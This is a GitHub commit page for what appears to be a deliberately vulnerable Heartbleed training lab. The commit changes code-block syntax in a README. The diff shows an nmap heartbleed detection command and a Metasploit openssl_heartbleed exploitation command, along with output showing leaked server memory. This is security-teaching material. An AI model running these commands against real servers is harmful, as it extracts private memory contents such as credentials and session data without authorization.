Skip to content

Commit

Permalink
Edited syntax highlighting
Browse files Browse the repository at this point in the history
  • Loading branch information
hmlio committed Aug 4, 2015
1 parent 4f48679 commit 967dc0a
Showing 1 changed file with 4 additions and 4 deletions.
8 changes: 4 additions & 4 deletions README.md
Original file line number Diff line number Diff line change
Expand Up @@ -16,7 +16,7 @@ You should be able to access the web application at http://your-ip:8443/.
# Checking
The web server/vulnerable openssl/libssl version can be verified and exploited as shown below (using a Kali machine is recommended):</br>

{% highlight bash %}
``` sh
root@kali:/tmp# nmap -sV -p 8443 --script=ssl-heartbleed your-ip

Starting Nmap 6.47 ( http://nmap.org ) at 2015-07-12 22:07 CEST
Expand All @@ -39,10 +39,10 @@ PORT STATE SERVICE VERSION

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.37 seconds
{% endhighlight %}
```

# Exploitation
{% highlight bash %}
``` sh
Using msfcli from the Metasploit framework:
root@kali:/tmp# msfcli auxiliary/scanner/ssl/openssl_heartbleed RHOSTS=your-ip RPORT=8443 VERBOSE=true E

Expand All @@ -52,4 +52,4 @@ root@kali:/tmp# msfcli auxiliary/scanner/ssl/openssl_heartbleed RHOSTS=your-ip R
[*] 192.168.179.230:8443 - Heartbeat response, 65535 bytes
[+] 192.168.179.230:8443 - Heartbeat response with leak
[*] 192.168.179.230:8443 - Printable info leaked: U`tcz~8}"V2|vf3<tf"!98532ED/A/39.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip
{% endhighlight %}
```

0 comments on commit 967dc0a

Please sign in to comment.